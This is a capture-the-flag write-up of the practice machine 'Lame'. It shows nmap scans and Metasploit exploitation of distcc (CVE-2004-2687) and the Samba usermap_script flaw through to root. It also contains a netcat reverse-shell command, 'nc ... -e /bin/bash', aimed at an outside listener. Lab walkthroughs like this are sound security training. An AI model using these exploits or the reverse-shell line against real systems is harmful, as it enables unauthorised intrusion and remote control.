Super easy box. Good for absolute beginners.
Initial NMAP
sudo nmap -sS -sV -p- -Pn -n --disable-arp-ping -T4 -v 10.10.10.3 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open microsoft-ds? 3632/tcp open distccd? Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Anonymous FTP allowed but no files inside:
ftp 10.10.10.3 Connected to 10.10.10.3. 220 (vsFTPd 2.3.4) Name (10.10.10.3:sweps): anonymous 331 Please specify the password. Password: 230 Login successful.
Checking searchsploit for vsFTPd 2.3.4 exploit
------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------- --------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py vsftpd 2.3.4 - Backdoor Command Execution (Metas | unix/remote/17491.rb ------------------------------------------------- ---------------------------------
No luck with Metasploit for the quick win.
*] 10.10.10.3:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 – USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Next up running nmaps NSE vuln scripts on the open ports finds distcc service is vulnerable to CVE -2004-2687
3632/tcp open distccd | distcc-cve2004-2687: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=1(daemon) gid=1(daemon) groups=1(daemon) | | References: | https://distcc.github.io/security.html | https://nvd.nist.gov/vuln/detail/CVE-2004-2687 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Quick search on metasploit:
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Exploit works and gets reverse shell:
[*] Started reverse TCP double handler on 10.10.14.32:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo qvtycnDuLZsZpLEM; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "qvtycnDuLZsZpLEM\r\n" [*] Matching... [*] A is input... ls [*] Command shell session 1 opened (10.10.14.32:4444 -> 10.10.10.3:40534) at 2021-10-06 05:29:56 -0400 id uid=1(daemon) gid=1(daemon) groups=1(daemon)
Terrible shell so initial reverse nc shell and upgrade with python:
nc -nv 10.10.14.32 6666 -e /bin/bash python -c 'import pty; pty.spawn("/bin/bash")' daemon@lame:/tmp$
Found some sshkeys but no luck. Will go back to later. Decided to check the SMB ports as this is a very easy rated box so should be low hanging fruit somewhere to get root:
searchsploit Samba 3.0.20 ----------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------- --------------------------------- Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command | unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
msfconsole search with excellent rating:
3 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution [*] Started reverse TCP handler on 10.10.14.32:6666 [*] Command shell session 1 opened (10.10.14.32:6666 -> 10.10.10.3:38760) at 2021-10-06 06:00:34 -0400id uid=0(firefart) gid=0(root)
Mitigations:
Keep system up to date.
Conclusion
This box showed how easy it is for outdated systems to be compromised with just a point and click methodology. One exploit got user shell, the other boot to root. There were also ssh keys in the root folder which should not have been readable and also the nmap binary had the SUID bits set. So quite a few easy escalations on this box. Hence the name “Lame”